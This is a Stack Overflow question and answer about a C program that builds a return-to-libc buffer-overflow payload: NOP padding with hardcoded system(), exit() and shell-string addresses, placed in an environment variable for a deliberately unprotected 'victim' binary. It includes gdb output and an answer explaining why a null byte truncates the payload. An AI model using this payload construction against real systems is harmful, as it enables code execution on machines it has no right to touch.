# why putenv(buf) doesn't work properly because memcpy(buf + 92, "\x00\x14\xe4\xf7" , 4) copies a \x00 byte to buf?

Tags: c, environment-variables, stack-overflow, memcpy, buffer-overflow

am using ubuntu 14.04. So am having latest kernel.
am trying to do Return to libc method.

here is my code to create a environment variable, which will be later input to the victim code

```
 #include<stdio.h>
#include<stdlib.h>
#include<string.h>

#define BUFFER_SIZE 104
#define NOP 0x90

char systemAddr[] = "\xb0\xe3\xe4\xf7";
char exitAddr[] = "\x00\x14\xe4\xf7";
char bashAddr[] = "\xcc\xd9\xe9\xff"; 

int main()
{

char *buf;
int bsize = BUFFER_SIZE;

if(!(buf = (char *)malloc(bsize)))
{
printf("can't allocate memory!");
exit(0);
}

memset(buf, NOP, 104);
memcpy(buf, "BUF=", 4);
memcpy(buf + 88, systemAddr, 4 );

memcpy(buf + 92, "\x00\x14\xe4\xf7" , 4);      //memcpy(buf + 92, exitAddr, 4);
memcpy(buf + 96, bashAddr, 4);

memcpy(buf + 100, "\x00\x00\x00\x00", 4);

printf("%s \n", buf);
putenv(buf);
system("/bin/bash");


return 0;
}
```

the problem is in this line,

memcpy(buf + 92, "\x00\x14\xe4\xf7" , 4); //memcpy(buf + 92, exitAddr, 4);

after i give the address with a null(\x00), when i check $BUF, in the buf+92 'th position some different values are seen.
upto 88 byte all copying done successfully. But i failed to copy exitAddr to the 92-95'th bytes.
i think this is because of starting "\x00". If i try with "(if i give \xaa\xaa\xaa\xaa it works fine)." it is working fine!

am giving the gdb output of my program

```
(gdb) run 
Starting program: /home/Stack Overflow/From tube/Ret2Libc 

Breakpoint 1, main () at Ret2Libc.c:40
40    memcpy(buf + 100, "\x00\x00\x00\x00", 4);

(gdb) x/1s buf
0xffffcf1c:    "BUF=", '\220' <repeats 84 times>, "\260\343\344", <incomplete sequence \367>

(gdb) x/4xw buf+88
0xffffcf74:    0xf7e4e3b0    0xf7e41400    0xffe9d9cc    0x90909090

(gdb) s

Breakpoint 2, main () at Ret2Libc.c:43
43    putenv(buf);

(gdb) x/4xw buf+88
0xffffcf74:    0xf7e4e3b0    0xf7e41400    0xffe9d9cc    0x000000

(gdb) s

Breakpoint 3, main () at Ret2Libc.c:44
44    system("/bin/sh");

(gdb) x/4xw buf+88
0xffffcf74:    0xf7e4e3b0    0xf7e41400    0xffe9d9cc    0x000000
(gdb) s
$   $BUF
/bin/sh: 1: ��������������������������������������������������������������������������������​��������: not found
$ exit

Breakpoint 4, main () at Ret2Libc.c:47
47    return 0;
(gdb) x/4xw buf+88
0xffffcf74:    0xf7e4e3b0    0xf7e41400    0xffe9d9cc    0x000000

(gdb) s
48    }
(gdb) x/4xw buf+88
0xffffcf74:    0xf7e4e3b0    0xf7e41400    0xffe9d9cc    0x000000

(gdb) c
Continuing.
[Inferior 1 (process 4808) exited normally]
(gdb)
```

Did you notice. The "buf variable having the real value till the end".

Now given below when i execute victim code,

```
$ gcc -ggdb -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack -o Ret2Libc Ret2Libc.c

  Notebook-PC:$ ./Ret2Libc 
    $ $BUF
    /bin/sh: 1: ����������������������������������������������������������������������������������������: not found
    $ gdb ./victim

Reading symbols from ./victim...done.

(gdb) b 12
Breakpoint 1 at 0x804848e: file victim.c, line 12.

(gdb) run $BUF
Starting program: /home/mj/victim $BUF
aa

Breakpoint 1, main (argc=2, argv=0xffffcf24) at victim.c:12
12      strcpy(array, argv[1] );

(gdb) x/8xw argv[1]
0xffffd156: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd166: 0x90909090  0x90909090  0x90909090  0x90909090

(gdb) x/8xw argv[1]+88
0xffffd1ae: 0x47445800  0x4e54565f  0x00373d52  0x5f474458
0xffffd1be: 0x53534553  0x5f4e4f49  0x633d4449  0x53530032

(gdb) x/8xw argv[1]+84
0xffffd1aa: 0xf7e4e3b0  0x47445800  0x4e54565f  0x00373d52
0xffffd1ba: 0x5f474458  0x53534553  0x5f4e4f49  0x633d4449
```

here we can see the from argv[1](http://www.hackforums.net/showthread.php?tid=4309954)+88  the data is changed. How it is? is it because "\x00" in the exitAddr? How can i overcome this?

[The same discussion is here also,please refer this too..](http://www.hackforums.net/showthread.php?tid=4309954)

Comment: `putenv` expects a string (that is, 0-terminated), you cannot embed 0-bytes in environment variables.

Comment: in my system EXIT ADDRESS is "\x00\x14\xe4\xf7". SO can't i create an environment variable including this address? Any other ways are there or not?

Comment: For the first question: Yes, an environment variable cannot contain a 0 byte. And for the second question: don't know off the top of my head.

Answer (score 0, accepted):

As @mafso points out, `putenv(buf)` expects a *string*.  In C a *string* is an array of `char` up to and including the terminating `'\0'`.

So when `buf = "BUF=...\x00\x14\xe4\xf7"; putenv(buf);`, it is as if `buf = "BUF=...";` was coded.

Rather than code the desired address of `0x0014e4f7` as 4 `char`, suggest coding the address as 8 hexadecimal characters  `buf = "BUF=...0014e4f7";`  Of course decoding the address needs to account for the new format.